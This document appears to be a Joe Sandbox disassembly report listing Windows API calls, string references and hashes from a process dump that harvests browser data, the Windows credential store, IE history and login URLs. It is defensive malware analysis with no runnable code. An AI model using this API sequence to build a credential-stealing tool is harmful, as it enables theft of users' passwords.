                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                • String ID: $/deleteregkey$/savelangfile
                                                • API String ID: 2744995895-28296030
                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                • wcsrchr.MSVCRT ref: 0040B738
                                                • memset.MSVCRT ref: 0040B756
                                                • memset.MSVCRT ref: 0040B7F5
                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                • memset.MSVCRT ref: 0040B851
                                                • memset.MSVCRT ref: 0040B8CA
                                                • memcmp.MSVCRT ref: 0040B9BF
                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                • memset.MSVCRT ref: 0040BB53
                                                • memcpy.MSVCRT ref: 0040BB66
                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                • String ID: chp$v10
                                                • API String ID: 170802307-2783969131
                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                • memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                • wcschr.MSVCRT ref: 0040E3B8
                                                • memcpy.MSVCRT ref: 0040E3EC
                                                • memcpy.MSVCRT ref: 0040E407
                                                • memcpy.MSVCRT ref: 0040E422
                                                • memcpy.MSVCRT ref: 0040E43D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                • API String ID: 3073804840-2252543386
                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                • String ID:
                                                • API String ID: 3715365532-3916222277
                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                • String ID: bhv
                                                • API String ID: 327780389-2689659898
                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                • API String ID: 2941347001-70141382
                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                • String ID:
                                                • API String ID: 2827331108-0
                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                • wcschr.MSVCRT ref: 0040C324
                                                • wcschr.MSVCRT ref: 0040C344
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                • GetLastError.KERNEL32 ref: 0040C373
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                • String ID: visited:
                                                • API String ID: 1157525455-1702587658
                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                • memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                • _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                • API String ID: 3883404497-2982631422
                                                • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040BC75
                                                • memset.MSVCRT ref: 0040BC8C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                • memcmp.MSVCRT ref: 0040BCD6
                                                • memcpy.MSVCRT ref: 0040BD2B
                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                • String ID:
                                                • API String ID: 509814883-3916222277
                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                • GetLastError.KERNEL32 ref: 0041847E
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile$??3@ErrorLast
                                                • String ID: |A
                                                • API String ID: 1407640353-1717621600
                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                • String ID: r!A
                                                • API String ID: 2791114272-628097481
                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                • wcslen.MSVCRT ref: 0040C82C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                • API String ID: 62308376-4196376884
                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                • wcslen.MSVCRT ref: 0040BE06
                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                • memset.MSVCRT ref: 0040BE91
                                                • memcpy.MSVCRT ref: 0040BEB2
                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                • wcschr.MSVCRT ref: 0040BF24
                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                • String ID:
                                                • API String ID: 3191383707-0
                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00403CBF
                                                • memset.MSVCRT ref: 00403CD4
                                                • memset.MSVCRT ref: 00403CE9
                                                • memset.MSVCRT ref: 00403CFE
                                                • memset.MSVCRT ref: 00403D13
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403DDA
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Waterfox$Waterfox\Profiles
                                                • API String ID: 3527940856-11920434
                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00403E50
                                                • memset.MSVCRT ref: 00403E65
                                                • memset.MSVCRT ref: 00403E7A
                                                • memset.MSVCRT ref: 00403E8F
                                                • memset.MSVCRT ref: 00403EA4
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403F6B
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
